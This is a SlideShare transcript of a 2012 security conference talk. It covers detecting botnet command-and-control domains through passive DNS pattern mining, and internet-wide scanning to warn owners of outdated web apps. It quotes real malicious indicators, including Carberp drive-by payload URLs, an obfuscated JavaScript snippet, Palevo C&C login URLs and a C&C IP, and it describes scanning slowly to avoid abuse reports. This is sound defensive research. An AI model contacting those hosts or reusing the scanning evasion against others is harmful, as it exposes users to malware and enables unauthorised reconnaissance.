SlideShare a Scribd company logo
Messing up with Kids playground:
   Eradicating easy targets

  Yarochkin Fyodor @fygrave
Vladimir Kropotov @vbkropotov



   Presented at HITBKL 2012
agenda



Introduction (cybecrime 2012 – russian style :)
Detecting malicious network infrastructure
Getting one-step-ahead
Conclusions
DCCrime-2012: Brief Introduction
●   Bots and Botnets – still popular :)
●   Monetization schemes vary.
●   DbD is one of the most common attack vectors
    –   We also have email
    –   We also have stupid users downloading sh*t
    –   Mobile is lucrative target (all your money are
        there)
DCCrime-2012: Introduction




“Traffic” - is still an important component in the process :)
Main “components” to deal with
●   Callback nodes (aka C&C)
●   Traffic:
    –   Compromised machines/or manipulated content
    –   Banner networks
    –   SEO (doorways)
What's new this year?
●   Automated detection gets difficult. (anti-
    sandboxing, anti-crawler tricks)
function() {
 var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/';
   …
   document.onmousemove = function() {
       …
 ● In some cases of idiocy, human interaction           is a
    must..
●   Mobile phone as the most common means of
    funds transfer
Mobile scams
●   Fake apps are still big
●   Android apps avail :)
So really, how easy it is to get pwned
             In Russia? :)
●   So the focus of this research:
    –   Identifying “bad kids” playground – mapping
        infrastructure, identifying potential targets,
        attempting to fix the problems, before “things hit
        hard”
Detecting malicious network
       infrastructure
DNS: (did u see this morning
      passive DNS talk? ;-))


With a spike of generative domain botnets, this
    seems like interesting research project

 DGAs produce very specific pattern in DNS
                 traffic
Is this the only method to call back?



                Nop..
Alternatives...




                  13
Domain generative bots
●   C&C is not hardcoded to maintain flexibility in
    cases when C&C is taken down.
●   Some sort of algorithm is used to generate
    domain names
●   Domains are tested for validity. IP address is
    obtained.
●   Sometimes obfuscation involved. (for example:
    manipulations applied to resolved IP address)
How it looks on the wire
C&C/generative domains and
            pattern mining
●   Generative-domain name based domains
    generate very specific voluminous DNS traffic
●   Our research is primarily focused on picking up
    these patterns. Example Carberp (details
    provided by Vladimir Kropotov)
Carberp
●   Bot Infection: Drive-By-HTTP
●   Payload and intermediate malware domains: normal,
    recent registration dates or DynDNS
●   Distributed via: Many many compromised web-sites, top
    score > 100 compromised resources detected during 1
    week.
●   C&C domains usually generated, but some special cases
    below ;-).
●   C&C and Malware domains located on the same AS (from
    bot point of view). Easy to detect.
●   Typical bot activity: Mass HTTP Post
Size     Payload         Referrer            URL                        Domain
9414     javascript      www.*****press.ru   /g/18418362672595167.js    beatshine.is-
                                                                        saved.org
45443    html            www.*****press.ru   /index.php?             activatedreplacing.
                                             28d9000e56c2a63080ff89c is-very-evil.org
                                             6f5357591
4135     application/x                       //images/r/785cee8be7f1da activatedreplacing.
         -jar                                9a9d60820cbf8b1840.jar    is-very-evil.org
155529   application/e                       /server_privileges.php? activatedreplacing.
         xecutable                           91370f5f009a815950578cb is-very-evil.org
                                             539f28b58=3
Size     Payload         Referrer        URL                 Domain
997      html            Infected site   /1/s.html           3645455029
4923     javascript      3645455029      /js/deployJava.js   Java.com
18046    application/x                   /1/exp.jar          3645455029
         -jar
138352   application/e                   /file1.dat          3645455029
         xecutable
Detection: related works
From Throw-Away Traffic to Bots: Detecting
Rise of DGA-Based Malware (Manos
Antonakakis, Roberto Redisci et al) (2012)
L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi.
EXPOSURE: Finding malicious domains using
passive dns analysis. In Proceedings of NDSS,
2011
etc..
What we do differently:
●   “lazy” WHOIS lookups, team cymru IP to ASN
    lookups
●   Our own passive DNS index
●   Sandbox farm (mainly to detect compromised
    websites automagically and study behavior)
Dealing with false positives: filtering
●   Generated sequences: n-gram analysis




●   WHOIS cross-ref (if available)
●   Ips belong to Malicious ASN
●   Public domain lists (alexa top 100k) works well
    as whitelist
Cat and mouse game
●   Of course all of this is easy to evade. Once you
    know the method. But security is always about
    'cat-n-mouse' game ;-)
Architecture
●   What we are building ;)
Are we using signatures?
    Yes and No..
●   We don't have signatures for C&C domains..
●   But we maintain patterns for suspicious whois
    data (registration date, registrar, email, ..)
●   Historical DNS and AS association (bad IP)
●   Generic patterns for generative domains (high,
    similarly distributed pattern of failed lookups
    within the same zone)
A walk through automated detection
●   In this example we will show how automated
    detection works step by step. We will show
    redis queries in form of interactive session:
Detection starting point: rcode: 3
         (Non-existing domains)
12




10




8


                                        Column 1
6                                       Column 2
                                        Column 3


4




2




0
        Row 1   Row 2   Row 3   Row 4
Rcode:2 domains
Detection: rcode:2 (server failure)
     (failed servers)
Sample analysis (step by step)
●   Start looking for a failed pattern and cluster id:
Sample analysis (two)
●   Get the cluster ID: (eu_11_14)




Clustering is based on domain similarity. Currently used characteristics:
 - f(zone, pattern (length, depth))
- additional characteristics (building up): natural language domain vs. generated string
(occurrence of two-character sequences - n-grams)
- domain registration parameters (obtained via WHOIS [ problematic! ] )
- cross-reference with existing malicious IP and AS reputation database (incrementally
built by us)
Sample analysis
●   Get other members of the cluster
Sample analysis
●   Find common members (notice avatarmaker.eu
    could be a false positive, easily filtered out
    through common denominator filering (IP,
    WHOIS information)
Sample analysis
●   So we have C&C IP 66.175.210.173
●    we can continue mining to see if we get any
    other domain names:
Sample analysis
●
    Look! We just met an old friend!!
Sample analysis
●   Palevo:
Mapping C&C (easily automated)

●   http://cihunemyror.eu/login.php
●   http://foxivusozuc.eu/login.php
●   http://ryqecolijet.eu/login.php
●   http://xuqohyxeqak.eu/login.php
●   http://foqaqehacew.eu/login.php
●   http://jecijyjudew.eu/login.php
●   http://voworemoziv.eu/login.php
●   http://mamixikusah.eu/login.php
●   http://qebahilojam.eu/login.php
●   http://foqaqehacew.eu/search.php
●   http://foqaqehacew.eu/search.php
●   http://foqaqehacew.eu/LMvg9Ng1d.php
Sample analysis
●   Finding more relevant domains:
Automation
Zoom in...
Performance
●   On single machine (32Gb RAM) we run up to
    2000 pkt/sec without significant performance
    loss
●   Average load:
Other Interesting numbers
●   Packets per day: ~130M filtered.
●   Mal. Domains/day: ~30k DNS queries (varies)
●   Avg. 30-50 req/minute for single domain
●
Uses of the data
●   Obvious: blacklists
●   Botnet take overs (costs 11USD or less ;)
●   Sinkholing
Detection
●   (demos, lets look at some videos :)
What could be more flux than
                fastflux? ;-)
●   WHOIS fastflux … HOW?!

    Domain ID:D166393631-LROR
    Domain Name:FOOTBALL-SECURITY-
    WETRLSGPIEO.ORG
    Created On:21-Aug-2012 01:23:52 UTC
    Last Updated On:21-Aug-2012 01:23:53 UTC
    Expiration Date:21-Aug-2013 01:23:52 UTC
    Sponsoring Registrar:Click Registrar, Inc. d/b/a
    publicdomainregistry.com (R1935-LROR)
    Status:CLIENT TRANSFER PROHIBITED
    Status:TRANSFER PROHIBITED
    Status:ADDPERIOD
    Registrant ID:PP-SP-001
    Registrant Name:Domain Admin
    Registrant Organization:PrivacyProtect.org
    Registrant Street1:ID#10760, PO Box 16
    Registrant Street2:Note - All Postal Mails Rejected, visit
    Privacyprotect.org
Moving ahead:
Finding easy targets before they do :)
In short, it is all about quick ways of finding idiots
    having no clue of what they are doing with
 wordpress, oscommerce, openx, [put yer fave]
And forcing them to update before they get owned
                           ;)
         And hmm.. doing it country-wide
disclaimer


 Just another “small data” project we play with.
        Around 4 machines solr cluster.

Largely inspired by “Fruit: why so low?” by Adam
            MetlStorm (hack.lu 2011)
Scanning internet is not new..
  but pretty much realistic
Architecture
●   Network port discovery (agents)
●   Banner collection (agents)
●   Backend Store: SOLR
●   Collectibles: services and ports, OS fingerprints,
●   ASN/OWNER/netblock/Country, geographical
    location/App data
Architecture(2)
●   Roughly something like that
Approach
●   Scan slow (avoid abuse reports)
●   Index time
●   Passive “mapper” (simple sniffer + browser
    fingerprinting at the moment)
●   Larger range of ports (account port numbers, which
    are actively being scanned from firewall log
    analysis, honeypot machines etc)
●   For web apps – (wafp fingerprinting) + index banner
    (noisy, cause of most of the abuse complaints)
How you use this shit...
Features
●   Scriptable via restful API (think of solr) (cuz UI
    is for sissies ;-))
●   Query by any combination of:
    –   software version/banner regex (solr/lucene style)
    –    geospatial search (via geohash)
    –   ASN or regex on ASN owner
    –   Country code
Uses
CERT team: automated notifications of idiots
running old wordpress within particular range,
geographic location or organization is a one
liner script
Questions


 @fygrave
@vbkropotov

More Related Content

Hitbkl 2012

  • 1. Messing up with Kids playground: Eradicating easy targets Yarochkin Fyodor @fygrave Vladimir Kropotov @vbkropotov Presented at HITBKL 2012
  • 2. agenda Introduction (cybecrime 2012 – russian style :) Detecting malicious network infrastructure Getting one-step-ahead Conclusions
  • 3. DCCrime-2012: Brief Introduction ● Bots and Botnets – still popular :) ● Monetization schemes vary. ● DbD is one of the most common attack vectors – We also have email – We also have stupid users downloading sh*t – Mobile is lucrative target (all your money are there)
  • 4. DCCrime-2012: Introduction “Traffic” - is still an important component in the process :)
  • 5. Main “components” to deal with ● Callback nodes (aka C&C) ● Traffic: – Compromised machines/or manipulated content – Banner networks – SEO (doorways)
  • 6. What's new this year? ● Automated detection gets difficult. (anti- sandboxing, anti-crawler tricks) function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() { … ● In some cases of idiocy, human interaction is a must.. ● Mobile phone as the most common means of funds transfer
  • 7. Mobile scams ● Fake apps are still big ● Android apps avail :)
  • 8. So really, how easy it is to get pwned In Russia? :)
  • 9. So the focus of this research: – Identifying “bad kids” playground – mapping infrastructure, identifying potential targets, attempting to fix the problems, before “things hit hard”
  • 10. Detecting malicious network infrastructure
  • 11. DNS: (did u see this morning passive DNS talk? ;-)) With a spike of generative domain botnets, this seems like interesting research project DGAs produce very specific pattern in DNS traffic
  • 12. Is this the only method to call back? Nop..
  • 14. Domain generative bots ● C&C is not hardcoded to maintain flexibility in cases when C&C is taken down. ● Some sort of algorithm is used to generate domain names ● Domains are tested for validity. IP address is obtained. ● Sometimes obfuscation involved. (for example: manipulations applied to resolved IP address)
  • 15. How it looks on the wire
  • 16. C&C/generative domains and pattern mining ● Generative-domain name based domains generate very specific voluminous DNS traffic ● Our research is primarily focused on picking up these patterns. Example Carberp (details provided by Vladimir Kropotov)
  • 17. Carberp ● Bot Infection: Drive-By-HTTP ● Payload and intermediate malware domains: normal, recent registration dates or DynDNS ● Distributed via: Many many compromised web-sites, top score > 100 compromised resources detected during 1 week. ● C&C domains usually generated, but some special cases below ;-). ● C&C and Malware domains located on the same AS (from bot point of view). Easy to detect. ● Typical bot activity: Mass HTTP Post
  • 18. Size Payload Referrer URL Domain 9414 javascript www.*****press.ru /g/18418362672595167.js beatshine.is- saved.org 45443 html www.*****press.ru /index.php? activatedreplacing. 28d9000e56c2a63080ff89c is-very-evil.org 6f5357591 4135 application/x //images/r/785cee8be7f1da activatedreplacing. -jar 9a9d60820cbf8b1840.jar is-very-evil.org 155529 application/e /server_privileges.php? activatedreplacing. xecutable 91370f5f009a815950578cb is-very-evil.org 539f28b58=3
  • 19. Size Payload Referrer URL Domain 997 html Infected site /1/s.html 3645455029 4923 javascript 3645455029 /js/deployJava.js Java.com 18046 application/x /1/exp.jar 3645455029 -jar 138352 application/e /file1.dat 3645455029 xecutable
  • 20. Detection: related works From Throw-Away Traffic to Bots: Detecting Rise of DGA-Based Malware (Manos Antonakakis, Roberto Redisci et al) (2012) L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi. EXPOSURE: Finding malicious domains using passive dns analysis. In Proceedings of NDSS, 2011 etc..
  • 21. What we do differently: ● “lazy” WHOIS lookups, team cymru IP to ASN lookups ● Our own passive DNS index ● Sandbox farm (mainly to detect compromised websites automagically and study behavior)
  • 22. Dealing with false positives: filtering ● Generated sequences: n-gram analysis ● WHOIS cross-ref (if available) ● Ips belong to Malicious ASN ● Public domain lists (alexa top 100k) works well as whitelist
  • 23. Cat and mouse game ● Of course all of this is easy to evade. Once you know the method. But security is always about 'cat-n-mouse' game ;-)
  • 24. Architecture ● What we are building ;)
  • 25. Are we using signatures? Yes and No.. ● We don't have signatures for C&C domains.. ● But we maintain patterns for suspicious whois data (registration date, registrar, email, ..) ● Historical DNS and AS association (bad IP) ● Generic patterns for generative domains (high, similarly distributed pattern of failed lookups within the same zone)
  • 26. A walk through automated detection ● In this example we will show how automated detection works step by step. We will show redis queries in form of interactive session:
  • 27. Detection starting point: rcode: 3 (Non-existing domains) 12 10 8 Column 1 6 Column 2 Column 3 4 2 0 Row 1 Row 2 Row 3 Row 4
  • 28. Rcode:2 domains Detection: rcode:2 (server failure) (failed servers)
  • 29. Sample analysis (step by step) ● Start looking for a failed pattern and cluster id:
  • 30. Sample analysis (two) ● Get the cluster ID: (eu_11_14) Clustering is based on domain similarity. Currently used characteristics: - f(zone, pattern (length, depth)) - additional characteristics (building up): natural language domain vs. generated string (occurrence of two-character sequences - n-grams) - domain registration parameters (obtained via WHOIS [ problematic! ] ) - cross-reference with existing malicious IP and AS reputation database (incrementally built by us)
  • 31. Sample analysis ● Get other members of the cluster
  • 32. Sample analysis ● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common denominator filering (IP, WHOIS information)
  • 33. Sample analysis ● So we have C&C IP 66.175.210.173 ● we can continue mining to see if we get any other domain names:
  • 34. Sample analysis ● Look! We just met an old friend!!
  • 36. Mapping C&C (easily automated) ● http://cihunemyror.eu/login.php ● http://foxivusozuc.eu/login.php ● http://ryqecolijet.eu/login.php ● http://xuqohyxeqak.eu/login.php ● http://foqaqehacew.eu/login.php ● http://jecijyjudew.eu/login.php ● http://voworemoziv.eu/login.php ● http://mamixikusah.eu/login.php ● http://qebahilojam.eu/login.php ● http://foqaqehacew.eu/search.php ● http://foqaqehacew.eu/search.php ● http://foqaqehacew.eu/LMvg9Ng1d.php
  • 37. Sample analysis ● Finding more relevant domains:
  • 40. Performance ● On single machine (32Gb RAM) we run up to 2000 pkt/sec without significant performance loss ● Average load:
  • 41. Other Interesting numbers ● Packets per day: ~130M filtered. ● Mal. Domains/day: ~30k DNS queries (varies) ● Avg. 30-50 req/minute for single domain ●
  • 42. Uses of the data ● Obvious: blacklists ● Botnet take overs (costs 11USD or less ;) ● Sinkholing
  • 43. Detection ● (demos, lets look at some videos :)
  • 44. What could be more flux than fastflux? ;-) ● WHOIS fastflux … HOW?! Domain ID:D166393631-LROR Domain Name:FOOTBALL-SECURITY- WETRLSGPIEO.ORG Created On:21-Aug-2012 01:23:52 UTC Last Updated On:21-Aug-2012 01:23:53 UTC Expiration Date:21-Aug-2013 01:23:52 UTC Sponsoring Registrar:Click Registrar, Inc. d/b/a publicdomainregistry.com (R1935-LROR) Status:CLIENT TRANSFER PROHIBITED Status:TRANSFER PROHIBITED Status:ADDPERIOD Registrant ID:PP-SP-001 Registrant Name:Domain Admin Registrant Organization:PrivacyProtect.org Registrant Street1:ID#10760, PO Box 16 Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
  • 45. Moving ahead: Finding easy targets before they do :)
  • 46. In short, it is all about quick ways of finding idiots having no clue of what they are doing with wordpress, oscommerce, openx, [put yer fave] And forcing them to update before they get owned ;) And hmm.. doing it country-wide
  • 47. disclaimer Just another “small data” project we play with. Around 4 machines solr cluster. Largely inspired by “Fruit: why so low?” by Adam MetlStorm (hack.lu 2011)
  • 48. Scanning internet is not new.. but pretty much realistic
  • 49. Architecture ● Network port discovery (agents) ● Banner collection (agents) ● Backend Store: SOLR ● Collectibles: services and ports, OS fingerprints, ● ASN/OWNER/netblock/Country, geographical location/App data
  • 50. Architecture(2) ● Roughly something like that
  • 51. Approach ● Scan slow (avoid abuse reports) ● Index time ● Passive “mapper” (simple sniffer + browser fingerprinting at the moment) ● Larger range of ports (account port numbers, which are actively being scanned from firewall log analysis, honeypot machines etc) ● For web apps – (wafp fingerprinting) + index banner (noisy, cause of most of the abuse complaints)
  • 52. How you use this shit...
  • 53. Features ● Scriptable via restful API (think of solr) (cuz UI is for sissies ;-)) ● Query by any combination of: – software version/banner regex (solr/lucene style) – geospatial search (via geohash) – ASN or regex on ASN owner – Country code
  • 54. Uses CERT team: automated notifications of idiots running old wordpress within particular range, geographic location or organization is a one liner script